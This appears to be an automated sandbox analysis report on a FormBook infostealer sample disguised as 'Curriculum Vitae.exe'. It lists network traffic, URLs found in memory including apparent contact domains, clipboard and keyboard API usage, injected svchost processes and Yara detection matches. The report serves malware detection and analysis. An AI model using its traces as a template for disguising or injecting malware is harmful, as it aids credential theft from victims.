            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:15:55 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 75 32 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6u21/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:15:57 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 75 32 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6u21/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:16:00 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 75 32 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6u21/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:16:02 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 75 32 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6u21/ was not found on this server.</p></body></html>
            Source: firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/
            Source: firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/195.html
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/196.html
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/197.html
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/198.html
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/199.html
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/200.html
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/201.html
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/202.html
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/203.html
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/204.html
            Source: firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/search.php?act=search
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_system/login.php
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_system/script/c_html_js_add.php
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_system/script/jquery-2.2.4.min.js
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_system/script/zblogphp.js
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/script/common.js?v=1.2.4
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/script/custom.js?v=1.2.4
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.css
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-4.3.3.min.css
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/images/logo.png
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/style.min.css?v=1.2.4
            Source: OAIexgManRWDie.exe, 00000007.00000002.3272150093.0000000005258000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mediaplug.biz
            Source: OAIexgManRWDie.exe, 00000007.00000002.3272150093.0000000005258000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mediaplug.biz/13ne/
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033B
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033P
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033t
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033y
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: regsvr32.exe, 00000006.00000003.2848830372.0000000007E6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.htmlit.com.cn/
            Source: regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.zblogcn.com/
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DAEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00DAEAFF
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DAED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00DAED6A
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DAEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00DAEAFF
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D9AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00D9AA57
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DC9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00DC9576

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3272150093.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3270513157.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2666088394.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2666668441.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3270554488.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2665951843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3272150093.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3270513157.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2666088394.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2666668441.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3270554488.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2665951843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: Curriculum Vitae.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Curriculum Vitae.exe, 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_258cfb11-7
            Source: Curriculum Vitae.exe, 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_82407f35-d
            Source: Curriculum Vitae.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3d479051-6
            Source: Curriculum Vitae.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a3e369b4-7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C043 NtClose,2_2_0042C043
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03072DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03072C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,2_2_030735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074340 NtSetContextThread,2_2_03074340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074650 NtSuspendThread,2_2_03074650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B80 NtQueryInformationFile,2_2_03072B80
